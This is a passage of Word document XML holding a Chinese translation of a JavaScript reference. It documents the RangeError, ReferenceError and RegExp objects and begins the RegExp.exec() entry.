    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当一个数字超出合法的范围时抛出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>→RangeError</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RangeError()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new RangeError(message)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t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提供关于异常的细节信息的可选错误消息。如果指定，则这个参数将用做当前</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新构造的</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将把它作为其</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值；在其他情况下，它将使用预设的默认值作为这个属性的值。不使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操</w:t>
      </w:r>
      <w:r>
        <w:t>作符，像调用函数一样调用</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数时，它的行为和使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样。</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message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提供了关于当前异常的细节的错误消息。这个属性的值为传入构造函数的字符串或者预定义的默认字符串。细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>。</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一个指定异常类型的字符串。所有</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的这个属性都继承自值</w:t>
      </w:r>
      <w:r>
        <w:t>"RangeError"</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当一个数值不在合法的范围内时，将抛出</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>类的一个实例。例如，将数组的长度设置为负数将抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>。关于抛出</w:t>
      </w:r>
      <w:r>
        <w:t>及捕获异常的细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error</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Error</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="744" w:name="ReferenceError"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="744"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取不存在的变量时抛出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>new ReferenceError()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new ReferenceError(message)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t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条可选的错误消息，用于提供关于该异常的细节。如果指定，这个参数将用做当前</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新构造的</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将把它用做自己的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值；在其他情况下，它将使用预定义的默认字符串作为</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。不使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，像调用函数一样调用</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数时，它的行为和使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一条提供关于该异常的细节的错误消息。这个属性的值为传入构造函数的字符串或者是预定义的默认字符串。细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>。</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一个指定异常类型的</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。所有</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的这个属性都继承自值</w:t>
      </w:r>
      <w:r>
        <w:t>"ReferenceError"</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试图读一个不存在的变量的值时将抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:r>
        <w:t>类。关于异常的抛出和捕获的细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error</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Error</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="745" w:name="RegExp"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="745"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于模式匹配的正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>直接量语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>/pattern/attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new RegExp(pattern,attributes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个指定正则表达式的模式的字符串或另</w:t>
      </w:r>
      <w:r>
        <w:t>一个正则表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个可选字符串，包含任意</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"i"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"m"</w:t>
      </w:r>
      <w:r>
        <w:t>属性，分别指定全局、区分大小写以及多行匹配。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前</w:t>
      </w:r>
      <w:r>
        <w:t>"m"</w:t>
      </w:r>
      <w:r>
        <w:t>属性不可用。如果</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>参数是一个正则表达式而不是字符串，则这个参数必须省略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，内容为指定的模式及标志。如果</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>参数是一个正则表达式而不是一个字符串，则</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数将使用和指定的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>一样的模式及标志来创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，像调用函数一样调用</w:t>
      </w:r>
      <w:r>
        <w:t>Re</w:t>
      </w:r>
      <w:r>
        <w:t>gExp()</w:t>
      </w:r>
      <w:r>
        <w:t>，则它的行为和带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样，不过，当</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>是一个正则表达</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>式时有所不同，在这种情况下，它只是简单地返回</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>，而不会新创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个合法的正则表达式，或</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>参数包含除</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"i"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"m"</w:t>
      </w:r>
      <w:r>
        <w:t>外的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，同时没有省略</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实例属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>global</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象是否有</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ignoreCase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象是否有</w:t>
      </w:r>
      <w:r>
        <w:t>"i"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后匹配的字符的位置，用于在字符串中找到多个匹配的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>multiline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象是否有</w:t>
      </w:r>
      <w:r>
        <w:t>"m"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对应正则表达式的源文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>执行强大的、通用的模式匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试一个字符串是否包含某个模式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表一个正则表达式，这是一个用于在字符串上执行强大的模式匹配的工具。关于正则表达式的语法及使用的完整细节可参阅第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w: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第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="746" w:name="RegExp_exec__"/>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="746"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通用的模式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp.exec(string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要搜索的字符串。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一个包含匹配结果的数组，如果没有找到匹配内容则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。返回的数组的格式的描述见下面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>抛出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在非</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用这个方法。</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exec()</w:t>
      </w:r>
      <w:r>
        <w:t>是所有</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>模式匹配方法中最强大的一个。它是一个通用的方法，某些地方用起来比</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.search()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
